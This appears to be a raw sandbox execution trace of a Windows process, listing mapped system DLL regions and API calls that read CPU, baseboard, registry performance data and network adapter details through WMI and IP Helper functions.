mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 2384 start_va = 0x410000 end_va = 0x412fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 2385 start_va = 0x420000 end_va = 0x430fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 2386 start_va = 0x410000 end_va = 0x412fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 2387 start_va = 0x420000 end_va = 0x430fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 2388 start_va = 0x410000 end_va = 0x41ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mrxsmb.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\mrxsmb.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\mrxsmb.sys.mui") Region: id = 2389 start_va = 0x13b0000 end_va = 0x1421fff monitored = 0 entry_point = 0x1407000 region_type = mapped_file name = "mrxsmb.sys" filename = "\\Windows\\System32\\drivers\\mrxsmb.sys" (normalized: "c:\\windows\\system32\\drivers\\mrxsmb.sys") Region: id = 2390 start_va = 0x410000 end_va = 0x41ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mrxsmb.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\mrxsmb.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\mrxsmb.sys.mui") Region: id = 2391 start_va = 0x13b0000 end_va = 0x1421fff monitored = 0 entry_point = 0x1407000 region_type = mapped_file name = "mrxsmb.sys" filename = "\\Windows\\System32\\drivers\\mrxsmb.sys" (normalized: "c:\\windows\\system32\\drivers\\mrxsmb.sys") Region: id = 2392 start_va = 0x410000 end_va = 0x428fff monitored = 0 entry_point = 0x41b610 region_type = mapped_file name = "eqossnap.dll" filename = "\\Windows\\System32\\eqossnap.dll" (normalized: "c:\\windows\\system32\\eqossnap.dll") Region: id = 2393 start_va = 0x430000 end_va = 0x435fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "eqossnap.dll.mui" filename = "\\Windows\\System32\\en-US\\eqossnap.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\eqossnap.dll.mui") Region: id = 2394 start_va = 0x410000 end_va = 0x428fff monitored = 0 entry_point = 0x41b610 region_type = mapped_file name = "eqossnap.dll" filename = "\\Windows\\System32\\eqossnap.dll" (normalized: "c:\\windows\\system32\\eqossnap.dll") Region: id = 2395 start_va = 0x430000 end_va = 0x435fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "eqossnap.dll.mui" filename = "\\Windows\\System32\\en-US\\eqossnap.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\eqossnap.dll.mui") Region: id = 2396 start_va = 0x410000 end_va = 0x417fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "peerdistsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\PeerDistSvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\peerdistsvc.dll.mui") Region: id = 2397 start_va = 0x13b0000 end_va = 0x1598fff monitored = 0 entry_point = 0x13b15f0 region_type = mapped_file name = "peerdistsvc.dll" filename = "\\Windows\\System32\\PeerDistSvc.dll" (normalized: "c:\\windows\\system32\\peerdistsvc.dll") Region: id = 2398 start_va = 0x410000 end_va = 0x417fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "peerdistsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\PeerDistSvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\peerdistsvc.dll.mui") Region: id = 2399 start_va = 0x13b0000 end_va = 0x1598fff monitored = 0 entry_point = 0x13b15f0 region_type = mapped_file name = "peerdistsvc.dll" filename = "\\Windows\\System32\\PeerDistSvc.dll" (normalized: "c:\\windows\\system32\\peerdistsvc.dll") Region: id = 2400 start_va = 0x410000 end_va = 0x420fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll" filename = "\\Windows\\System32\\WsmRes.dll" (normalized: "c:\\windows\\system32\\wsmres.dll") Region: id = 2401 start_va = 0x13b0000 end_va = 0x1409fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll.mui" filename = "\\Windows\\System32\\en-US\\WsmRes.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wsmres.dll.mui") Region: id = 2402 start_va = 0x410000 end_va = 0x420fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll" filename = "\\Windows\\System32\\WsmRes.dll" (normalized: "c:\\windows\\system32\\wsmres.dll") Region: id = 2403 start_va = 0x13b0000 end_va = 0x1409fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll.mui" filename = "\\Windows\\System32\\en-US\\WsmRes.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wsmres.dll.mui") Region: id = 2404 start_va = 0x410000 end_va = 0x411fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mprddm.dll.mui" filename = "\\Windows\\System32\\en-US\\mprddm.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mprddm.dll.mui") Region: id = 2405 start_va = 0x13b0000 end_va = 0x148ffff monitored = 0 entry_point = 0x1442eb0 region_type = mapped_file name = "mprddm.dll" filename = "\\Windows\\System32\\mprddm.dll" (normalized: "c:\\windows\\system32\\mprddm.dll") Region: id = 2410 start_va = 0x7ffa0e470000 end_va = 0x7ffa0e47dfff monitored = 0 entry_point = 0x7ffa0e472b10 region_type = mapped_file name = "perfos.dll" filename = "\\Windows\\System32\\perfos.dll" (normalized: "c:\\windows\\system32\\perfos.dll") Region: id = 2420 start_va = 0x410000 end_va = 0x412fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 2421 start_va = 0x7ffa0baf0000 end_va = 0x7ffa0bb27fff monitored = 0 entry_point = 0x7ffa0bb08cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2422 start_va = 0x7ffa13d60000 end_va = 0x7ffa13d67fff monitored = 0 entry_point = 0x7ffa13d61ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2423 start_va = 0x13b0000 end_va = 0x142ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Region: id = 2424 start_va = 0x7ffa0ba10000 end_va = 0x7ffa0ba25fff monitored = 0 entry_point = 0x7ffa0ba119f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 2425 start_va = 0x7ffa0b9f0000 end_va = 0x7ffa0ba09fff monitored = 0 entry_point = 0x7ffa0b9f2430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 2427 start_va = 0x7ffa11800000 end_va = 0x7ffa118a9fff monitored = 0 entry_point = 0x7ffa11827910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 2844 start_va = 0x420000 end_va = 0x423fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 2845 start_va = 0x1430000 end_va = 0x162ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001430000" filename = "" Region: id = 2859 start_va = 0x400000 end_va = 0x402fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Thread: id = 146 os_tid = 0x10a0 Thread: id = 147 os_tid = 0x109c Thread: id = 148 os_tid = 0x1098 [0155.507] DllCanUnloadNow () returned 0x1 [0275.691] DllCanUnloadNow () returned 0x1 Thread: id = 149 os_tid = 0x1094 Thread: id = 150 os_tid = 0x1090 Thread: id = 151 os_tid = 0x108c [0155.173] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2 [0155.263] RtlRestoreLastWin32Error () returned 0x352000 [0155.263] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xede118, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xede010 | out: pulNumLanguages=0xede118, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xede010) returned 1 [0155.263] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x4ca080 [0155.263] RtlRestoreLastWin32Error () returned 0x352000 [0155.263] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xede118, pwszLanguagesBuffer=0x4ca080, pcchLanguagesBuffer=0xede010 | out: pulNumLanguages=0xede118, pwszLanguagesBuffer=0x4ca080, pcchLanguagesBuffer=0xede010) returned 1 [0155.263] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x4ca090 [0155.263] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x4ca080) returned 1 [0155.263] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4dffc0 [0155.263] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x4dffc0, pulNumLanguages=0xede118 | out: pulNumLanguages=0xede118) returned 1 [0155.263] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x4dffc0) returned 1 [0155.284] LoadStringW (in: hInstance=0x7ff9fc2b0000, uID=0x3e, lpBuffer=0xedd6c0, cchBufferMax=256 | out: lpBuffer="Base Board") returned 0xa [0155.286] lstrlenW (lpString="Dell Inc.") returned 9 [0155.286] lstrlenW (lpString="0G3HR7") returned 6 [0155.287] lstrlenW (lpString="A00") returned 3 [0155.287] lstrlenW (lpString="..XXXXXXXXXXXXX.") returned 16 [0155.317] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x4) returned 0x4ca080 [0155.317] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x4ca080, pulNumLanguages=0xede1c0 | out: pulNumLanguages=0xede1c0) returned 1 [0155.317] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x4ca080) returned 1 [0155.317] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x4ca090) returned 1 [0158.300] RtlRestoreLastWin32Error () returned 0x352000 [0158.300] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xede118, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xede010 | out: pulNumLanguages=0xede118, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xede010) returned 1 [0158.300] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x4ca080 [0158.300] RtlRestoreLastWin32Error () returned 0x352000 [0158.301] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xede118, pwszLanguagesBuffer=0x4ca080, pcchLanguagesBuffer=0xede010 | out: pulNumLanguages=0xede118, pwszLanguagesBuffer=0x4ca080, pcchLanguagesBuffer=0xede010) returned 1 [0158.301] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x4ca090 [0158.301] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x4ca080) returned 1 [0158.301] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4dfce0 [0158.301] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x4dfce0, pulNumLanguages=0xede118 | out: pulNumLanguages=0xede118) returned 1 [0158.301] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x4dfce0) returned 1 [0158.303] malloc (_Size=0x600) returned 0xd66510 [0158.304] GetLogicalProcessorInformationEx (in: RelationshipType=0xffff, Buffer=0x0, ReturnedLength=0xedd7f8 | out: Buffer=0x0, ReturnedLength=0xedd7f8) returned 0 [0158.304] GetLastError () returned 0x7a [0158.304] malloc (_Size=0x250) returned 0xd88d60 [0158.304] GetLogicalProcessorInformationEx (in: RelationshipType=0xffff, Buffer=0xd88d60, ReturnedLength=0xedd7f8 | out: Buffer=0xd88d60, ReturnedLength=0xedd7f8) returned 1 [0158.304] GetActiveProcessorCount (GroupNumber=0xffff) returned 0x4 [0158.305] GetMaximumProcessorGroupCount () returned 0x1 [0158.305] malloc (_Size=0x40) returned 0xd61820 [0158.305] malloc (_Size=0x40) returned 0xd61aa0 [0158.305] malloc (_Size=0x8) returned 0xd65aa0 [0158.305] memcpy (in: _Dst=0xd61820, _Src=0xd88d80, _Size=0x10 | out: _Dst=0xd61820) returned 0xd61820 [0158.314] GetActiveProcessorCount (GroupNumber=0x0) returned 0x4 [0158.314] NtPowerInformation (in: InformationLevel=0x2e, InputBuffer=0xedd7f0, InputBufferLength=0x2, OutputBuffer=0xd66510, OutputBufferLength=0x60 | out: OutputBuffer=0xd66510) returned 0x0 [0158.314] _vsnwprintf (in: _Buffer=0xedd690, _BufferCount=0x63, _Format="CPU%d", _ArgList=0xedcf88 | out: _Buffer="CPU0") returned 4 [0158.315] GetCurrentThread () returned 0xfffffffffffffffe [0158.315] SetThreadGroupAffinity (in: hThread=0xfffffffffffffffe, GroupAffinity=0xedcee0, PreviousGroupAffinity=0xedcef0 | out: PreviousGroupAffinity=0xedcef0) returned 1 [0158.315] GetSystemInfo (in: lpSystemInfo=0xedd020 | out: lpSystemInfo=0xedd020*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0158.316] mbstowcs (in: _Dest=0xedd2a8, _Source="GenuineIntel", _MaxCount=0x28 | out: _Dest="GenuineIntel") returned 0xc [0158.316] _wcsicmp (_String1="GenuineIntel", _String2="GenuineIntel") returned 0 [0158.317] mbstowcs (in: _Dest=0xedd118, _Source="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz", _MaxCount=0x28 | out: _Dest="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x27 [0158.317] GetCurrentThread () returned 0xfffffffffffffffe [0158.317] SetThreadGroupAffinity (in: hThread=0xfffffffffffffffe, GroupAffinity=0xedcef0, PreviousGroupAffinity=0x0 | out: PreviousGroupAffinity=0x0) returned 1 [0158.321] LoadStringW (in: hInstance=0x7ff9fc2b0000, uID=0x2c, lpBuffer=0xedccf0, cchBufferMax=256 | out: lpBuffer="CPU %d") returned 0x6 [0176.493] malloc (_Size=0x35140) returned 0xd898e0 [0176.551] _wtoi (_String="238") returned 238 [0176.552] _wtoi (_String="6") returned 6 [0176.552] _itow (in: _Dest=0x0, _Radix=15586752 | out: _Dest=0x0) returned="0" [0176.552] _itow (in: _Dest=0xee, _Radix=15585040 | out: _Dest=0xee) returned="238" [0176.552] malloc (_Size=0x4000) returned 0xdbea30 [0176.552] RegQueryValueExW (in: hKey=0xffffffff80000004, lpValueName="238", lpReserved=0x0, lpType=0x0, lpData=0xdbea30, lpcbData=0xedcee4*=0x4000 | out: lpType=0x0, lpData=0xdbea30*=0x50, lpcbData=0xedcee4*=0x600) returned 0x0 [0176.842] free (_Block=0xdbea30) [0176.842] Sleep (dwMilliseconds=0x3e8) [0177.855] _itow (in: _Dest=0xee, _Radix=15585040 | out: _Dest=0xee) returned="238" [0177.855] malloc (_Size=0x4000) returned 0xdbea30 [0177.855] RegQueryValueExW (in: hKey=0xffffffff80000004, lpValueName="238", lpReserved=0x0, lpType=0x0, lpData=0xdbea30, lpcbData=0xedcee4*=0x4000 | out: lpType=0x0, lpData=0xdbea30*=0x50, lpcbData=0xedcee4*=0x600) returned 0x0 [0177.953] free (_Block=0xdbea30) [0177.956] free (_Block=0xd898e0) [0177.962] _vsnwprintf (in: _Buffer=0xedd5c0, _BufferCount=0x40, _Format="%04X%04X%04X%04X", _ArgList=0xedcf88 | out: _Buffer="0F8BFBFF00050654") returned 16 [0177.967] lstrlenW (lpString=" 0") returned 2 [0177.967] lstrlenW (lpString="Intel(R) Xeon(R) Gold 6126 CPU @ 2.60GHz") returned 40 [0177.968] lstrlenW (lpString="") returned 0 [0177.968] lstrlenW (lpString="") returned 0 [0177.969] lstrlenW (lpString="") returned 0 [0177.971] IsProcessorFeaturePresent (ProcessorFeature=0x14) returned 1 [0177.972] IsProcessorFeaturePresent (ProcessorFeature=0x15) returned 1 [0177.973] RtlNumberOfSetBitsUlongPtr (Target=0x1) returned 0x1 [0177.973] RtlNumberOfSetBitsUlongPtr (Target=0x2) returned 0x1 [0177.973] RtlNumberOfSetBitsUlongPtr (Target=0x4) returned 0x1 [0177.973] RtlNumberOfSetBitsUlongPtr (Target=0x8) returned 0x1 [0177.973] _vsnwprintf (in: _Buffer=0xedd880, _BufferCount=0x63, _Format="CPU%d", _ArgList=0xedd7c8 | out: _Buffer="CPU0") returned 4 [0177.975] free (_Block=0xd65aa0) [0177.976] free (_Block=0xd61aa0) [0177.976] free (_Block=0xd61820) [0177.977] free (_Block=0xd88d60) [0177.980] free (_Block=0xd66510) [0177.996] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x4) returned 0x1222e00 [0177.996] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x1222e00, pulNumLanguages=0xede1c0 | out: pulNumLanguages=0xede1c0) returned 1 [0177.996] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x1222e00) returned 1 [0177.996] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x4ca090) returned 1 [0178.341] RtlRestoreLastWin32Error () returned 0x352000 [0178.341] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xede118, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xede010 | out: pulNumLanguages=0xede118, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xede010) returned 1 [0178.341] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x1222f00 [0178.341] RtlRestoreLastWin32Error () returned 0x352000 [0178.341] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xede118, pwszLanguagesBuffer=0x1222f00, pcchLanguagesBuffer=0xede010 | out: pulNumLanguages=0xede118, pwszLanguagesBuffer=0x1222f00, pcchLanguagesBuffer=0xede010) returned 1 [0178.341] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x1223110 [0178.341] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x1222f00) returned 1 [0178.341] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x514b10 [0178.341] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x514b10, pulNumLanguages=0xede118 | out: pulNumLanguages=0xede118) returned 1 [0178.341] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x514b10) returned 1 [0178.345] VirtualProtect (in: lpAddress=0x7ff9fc47a000, dwSize=0x4f0, flNewProtect=0x4, lpflOldProtect=0x7ff9fc467f20 | out: lpflOldProtect=0x7ff9fc467f20*=0x2) returned 1 [0178.345] LoadLibraryExA (lpLibFileName="IPHLPAPI.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ffa0baf0000 [0178.349] GetProcAddress (hModule=0x7ffa0baf0000, lpProcName="GetAdaptersAddresses") returned 0x7ffa0baf2a20 [0178.350] VirtualProtect (in: lpAddress=0x7ff9fc47a000, dwSize=0x4f0, flNewProtect=0x2, lpflOldProtect=0xedd8e0 | out: lpflOldProtect=0xedd8e0*=0x4) returned 1 [0178.350] GetAdaptersAddresses (in: Family=0x0, Flags=0x0, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0xedd9b8*=0x0 | out: AdapterAddresses=0x0, SizePointer=0xedd9b8*=0x1128) returned 0x6f [0178.374] malloc (_Size=0x1128) returned 0xd67530 [0178.374] GetAdaptersAddresses (in: Family=0x0, Flags=0x0, Reserved=0x0, AdapterAddresses=0xd67530, SizePointer=0xedd9b8*=0x1128 | out: AdapterAddresses=0xd67530*(Alignment=0x6000001c0, Length=0x1c0, IfIndex=0x6, Next=0xd67af0, AdapterName="{E96D977E-F067-4CE9-924D-F6E0A04729E4}", FirstUnicastAddress=0xd677a0, FirstAnycastAddress=0x0, FirstMulticastAddress=0xd67850, FirstDnsServerAddress=0xd67ac0, DnsSuffix="", Description="Intel(R) 82574L Gigabit Network Connection #2", FriendlyName="Ethernet 2", PhysicalAddress=([0]=0x0, [1]=0x14, [2]=0xc6, [3]=0x42, [4]=0xf0, [5]=0x9, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x1c5, DdnsEnabled=0x1c5, RegisterAdapterSuffix=0x1c5, Dhcpv4Enabled=0x1c5, ReceiveOnly=0x1c5, NoMulticast=0x1c5, Ipv6OtherStatefulConfig=0x1c5, NetbiosOverTcpipEnabled=0x1c5, Ipv4Enabled=0x1c5, Ipv6Enabled=0x1c5, Ipv6ManagedAddressConfigurationSupported=0x1c5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0x6, ZoneIndices=([0]=0x6, [1]=0x6, [2]=0x6, [3]=0x6, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6008002000000, Dhcpv4Server.lpSockaddr=0xd676f0*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11eb6c9dc20d55b0, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x28, [5]=0xb6, [6]=0x28, [7]=0x5e, [8]=0x0, [9]=0xf, [10]=0xf3, [11]=0xe1, [12]=0x61, [13]=0x38, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x6000ff3, FirstDnsSuffix=0x0), SizePointer=0xedd9b8*=0x1128) returned 0x0 [0178.384] malloc (_Size=0x68) returned 0xd600a0 [0178.384] memcpy (in: _Dst=0xd600ec, _Src=0xd67580, _Size=0x6 | out: _Dst=0xd600ec) returned 0xd600ec [0178.385] VirtualProtect (in: lpAddress=0x7ff9fc47a000, dwSize=0x4f0, flNewProtect=0x4, lpflOldProtect=0x7ff9fc467f20 | out: lpflOldProtect=0x7ff9fc467f20*=0x2) returned 1 [0178.385] GetProcAddress (hModule=0x7ffa0baf0000, lpProcName="GetIpForwardTable2") returned 0x7ffa0bafa540 [0178.385] VirtualProtect (in: lpAddress=0x7ff9fc47a000, dwSize=0x4f0, flNewProtect=0x2, lpflOldProtect=0xedd850 | out: lpflOldProtect=0xedd850*=0x4) returned 1 [0178.386] GetIpForwardTable2 () returned 0x0 [0178.387] malloc (_Size=0x20) returned 0xd67430 [0178.387] RtlIpv6AddressToStringW () returned 0xedd80e [0178.388] malloc (_Size=0x20) returned 0xd67460 [0178.388] RtlIpv4AddressToStringW () returned 0xedd7fa [0178.388] VirtualProtect (in: lpAddress=0x7ff9fc47a000, dwSize=0x4f0, flNewProtect=0x4, lpflOldProtect=0x7ff9fc467f20 | out: lpflOldProtect=0x7ff9fc467f20*=0x2) returned 1 [0178.389] GetProcAddress (hModule=0x7ffa0baf0000, lpProcName="ConvertLengthToIpv4Mask") returned 0x7ffa0baf1c40 [0178.389] VirtualProtect (in: lpAddress=0x7ff9fc47a000, dwSize=0x4f0, flNewProtect=0x2, lpflOldProtect=0xedd740 | out: lpflOldProtect=0xedd740*=0x4) returned 1 [0178.389] ConvertLengthToIpv4Mask (in: MaskLength=0x18, Mask=0xedd7c8 | out: Mask=0xedd7c8) returned 0x0 [0178.389] RtlIpv4AddressToStringW () returned 0xedd7fa [0178.389] malloc (_Size=0x20) returned 0xd66f50 [0178.389] RtlIpv4AddressToStringW () returned 0xedd7f6 [0178.390] VirtualProtect (in: lpAddress=0x7ff9fc47a000, dwSize=0x4f0, flNewProtect=0x4, lpflOldProtect=0x7ff9fc467f20 | out: lpflOldProtect=0x7ff9fc467f20*=0x2) returned 1 [0178.390] GetProcAddress (hModule=0x7ffa0baf0000, lpProcName="FreeMibTable") returned 0x7ffa0baf2840 [0178.390] VirtualProtect (in: lpAddress=0x7ff9fc47a000, dwSize=0x4f0, flNewProtect=0x2, lpflOldProtect=0xedd850 | out: lpflOldProtect=0xedd850*=0x4) returned 1 [0178.390] FreeMibTable () returned 0x1 [0178.390] malloc (_Size=0x68) returned 0xd603b0 [0178.391] GetIpForwardTable2 () returned 0x0 [0178.391] malloc (_Size=0x20) returned 0xd66f80 [0178.391] RtlIpv6AddressToStringW () returned 0xedd7e6 [0178.391] malloc (_Size=0x20) returned 0xd670d0 [0178.391] RtlIpv4AddressToStringW () returned 0xedd7f2 [0178.391] ConvertLengthToIpv4Mask (in: MaskLength=0x8, Mask=0xedd7c8 | out: Mask=0xedd7c8) returned 0x0 [0178.392] RtlIpv4AddressToStringW () returned 0xedd7f2 [0178.392] FreeMibTable () returned 0x1 [0178.392] malloc (_Size=0x68) returned 0xd60500 [0178.392] malloc (_Size=0x68) returned 0xd87c20 [0178.392] memcpy (in: _Dst=0xd87c6c, _Src=0xd682c8, _Size=0x8 | out: _Dst=0xd87c6c) returned 0xd87c6c [0178.392] GetIpForwardTable2 () returned 0x0 [0178.393] malloc (_Size=0x20) returned 0xd67310 [0178.393] RtlIpv6AddressToStringW () returned 0xedd826 [0178.393] malloc (_Size=0x20) returned 0xd674c0 [0178.393] RtlIpv6AddressToStringW () returned 0xedd810 [0178.393] malloc (_Size=0x20) returned 0xd674f0 [0178.393] RtlIpv6AddressToStringW () returned 0xedd7e4 [0178.393] FreeMibTable () returned 0x1 [0178.394] free (_Block=0xd67530) [0178.400] _vsnwprintf (in: _Buffer=0xedd6f0, _BufferCount=0x105, _Format="SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}", _ArgList=0xedc708 | out: _Buffer="SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}") returned 77 [0178.401] _wtol (_String="0000") returned 0 [0178.405] malloc (_Size=0x48) returned 0xd61dc0 [0178.406] _wtol (_String="0001") returned 1 